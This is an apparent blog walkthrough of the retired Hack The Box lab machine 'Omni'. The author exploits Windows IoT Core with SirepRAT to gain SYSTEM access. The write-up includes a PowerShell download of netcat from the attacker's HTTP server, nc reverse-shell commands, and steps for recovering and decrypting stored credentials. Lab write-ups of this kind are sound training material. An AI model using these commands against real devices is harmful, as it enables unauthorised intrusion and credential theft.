Hack The Box Walkthrough Guide To: Omni

Click the icon to Follow me:- twitterTelegramRedditDiscord

EDIT: Now unlocked for all as the machine has been retired.

Disclaimer: I do NOT want you to read this if you have not even tried to attempt any of it yourself first! This is intended as a guide once you have tried everything to work it out yourself and are really stuck. If you just follow along and never try to work it out, then you will struggle to learn. Spend some time doing decent enumeration. As they say in the OSCP the most important thing is, enumeration, enumeration, enumeration. With that out of the way, let us get on with some hack the box. I hope this is of some use.

Setup:
Kali Linux VM (connected to HackTheBox via OpenVPN)
CherryTree (for Notes)

I have a template I use in Cherry Tree, that reminds me of some of the things I should be doing or checking for. As with all the machines, this often needs additional sections added to get further into the machine. Its just a generic starting template. I use it to dump notes or information that I might want to come back to later.

image 51

Rule Number 1: ALWAYS RESET THE MACHINE BEFORE YOU START! or go VIP!

Enumeration

Start with nmap

nmap -v -sC -sV -T5 -p- 10.10.10.204 -Pn

Highlight anything that initially might be of interest

image 53
Windows Device portal tells me that this is a Windows Core IOT device

There is a port 8080 available, so lets fire up burp and have a look at that.

image 70
Login page on port 8080

After trying the typical admin/admin and admin/[email protected] (deafult for IoT Core) and having no luck, I look around for other things of interest in the nmap scan.

After looking at the results, we can see that this appears to be a Windows IOT Core device. Knowing that we go and do some digging to find anything that might be of use to us. This we find in the form of SafeBreach’s SirepRAT.

Exploit

image 54
GitHub repo – SafeBreach SirepRAT – RCE as SYSTEM on Windows IoT Core

Git clone that repo and run the following command to test if it works.

python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
image 55
RCE is possible as we can now read the Windows hosts file.

Now we want to start uploading files onto the host , so we can get a little more stable interactive shell. We do this by uploading something like nc.exe

image 56
Left: SirepRAT script | Right: Python3 http.server

Now we have uploaded the file we cant to try and execute nc.exe and catch the remote shell

image 57
x86 nc version not suitable

Turns out that the x86 version wont work and we need to upload the x64 version, so same thing again but this time upload the x64 version, nc64.exe. Which you can download from here https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip

To download the file from my machine I use pythons simple http server that was burned into my brain when practising for my OSCP years ago.

This has not changed a little with python3 so you want to use

python3 -m http.server <PORT>
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args "Invoke-WebRequest 'http://10.10.16.171:8181/nc.exe' -OutFile 'nc.exe'"
image 59
We have our remote shell.
Top Left: SirepRAT exploit | Top Right: Python3 http.server
Bottom: Metasploit console

We can now interact with this shell, via nc.exe or msfconsole, dealers choice 😉

Privilege Escalation

With this new shell, we need to start doing some enumeration to escalate privileges

[Security.Principal.WindowsIdentity]::GetCurrent()

The command above gives us some information about the user that we are running as. As SafeBreach promised, we have a SYSTEM shell.

image 60
Current Identity running as SYSTEM
Get-CimInstance Win32_Group | Where-Object { [Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains $_.SID }

This command show us that we are in the admin group also.

image 61
Admin group

Now we want to look around for interesting files and folders.

image 62
Directory listing of the C:\

The Users folder is always a good place to start, remembering we thave SYSTEM permissions there should be no issues accessing the files. But as it turns out there was nothing in there, but that Data folder looks interesting, lets see in there.

image 63
Directory listing of users.


Now this users folder has more interesting files and folders for sure, a handy list of usernames. This might come in handy later.

image 64
List of user folders

So we look at the admin folders and see the root.txt flag. Well that was easy! Job done, grab a beer……. is what I thought, but it turns out it was not the flag but a Secure Powershell Encrypted Password.

image 65
Encrypted PowerShell password

Same goes for the user “app”

image 66
Encrypted PowerShell Password

At this point, off I got to read up about decrypting Secure String PowerShell Passwords… thanks to StackOverflow, I get the hint I needed.

image 67
Stack Overflow Command to decrypt the credentials

However, it seems when running this as the SYSTEM shell, I have just seemed to crash the remote shell. So had to re-read the stack overflow message again, it says “with the same user account that encrypted them on the same machine”… there was my problem.

Now Back to looking around for potential usernames and passwords. Many of my Windows priv esc scripts were not working on this machine so , I started manually looking around.

The current shell was simple cmd, so wanted to move to PowerShell rather than keep typing it in, simple type:

powershell

After a while visiting directories and typing

ls -force

Which will also search for hidden files in folders, we eventually find “r.bat”

image 68
Hidden batch file

using the command “type” we can print the file to the screen

type r.bat
image 69
Two usernames and passwords located in a hidden batch file.

We now have 2 usernames and passwords that we can use. app and administrator.

We now have to think about the inital nmap scan with the port 8080 that we were not able to login to? Let’s try some of the credentials on that login page.

Every edition of Windows 10 provides a web interface that you can use to manage and configure your device remotely called Windows Device Portal. It’s enabled by default in Windows 10 IoT Core and runs upon device startup. You can access it by connecting to http://:8080. The files for the Windows Device Portal can be found in C:\Windows\WebManagement\www on the device. Here’s a summary of the tabs currently available.

image 83
Windows Portal Summary
image 82
Windows Portal Summary

Login with the username “app” that we found and the password.

image 71
Successful login with the username app

Now we are logged in as a different user, we should have different permissions. Having noticed the “Run Command” section, this can get us another remote shell as that users “app”.

image 72
Run Command section of the portal

So lets catch a new remote shell

image 73
Using the nc64 from earlier to spawn a new remote shell as the user app
image 75
nc showing a new remote shell on port 6666

Now we can see with the new shell , different permissions

image 76
Permissions of the app user.

Now we want to decrypt the credentials from earlier using the Stack Overflow post.

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt

PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
image 77
Decrypted Password

Nice! We have a user flag, go and store it somewhere or add it into the flags section on the hack the box website.

Now try to decrypt the root flag! Oh…. yeah remember earlier, “with the same user account that encrypted them on the same machine”. So we should now login with the other account that we found “administrator” .

image 84
Portal login as “administrator”

Again we want to get another remote shell, but this time as the “administrator” user.

image 85
Remote shell command for the user “administrator”

We can use the following command, this time on a different port and a new nc listener waiting to capture the connection.

c:\windows\system32\nc64.exe 10.10.16.171 7777 -e powershell
image 86
nc listener

We get confirmation of the shell

image 87
Remote shell captured.

Check the user that we are logged in as

Get-CimInstance Win32_Group | Where-Object { [Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains $_.SID }
Get-CimInstance Win32_Group | Where-Object { [Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains $_.SID }
image 88
Checking permissions

And finally we decrypt the root flag

image 90
Decrypt the root flag

If you wanted, you can even just have a play around with the portal dashboard and take a screenshot

image 92
IoT Core Screenshot
image 79
Omni has been Pwned in Hack The Box Labs

__________________________________________________________________________________________________

I hope this helped you out. Share my article, links or consider supporting this site by becoming a patreon or by using my affiliate links.

Recommended Reading

Hands-On Penetration Testing on Windows: Unleash Kali Linux, PowerShell, and Windows debugging tools for security testing and analysisir?t=redpacketsecu 20&l=am2&o=1&a=1788295668

Raspberry Pi and Visual Basic: Programming Windows 10 IoTir?t=redpacketsecu 20&l=am2&o=1&a=0692071881

Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threatsir?t=redpacketsecu 20&l=am2&o=1&a=1839216417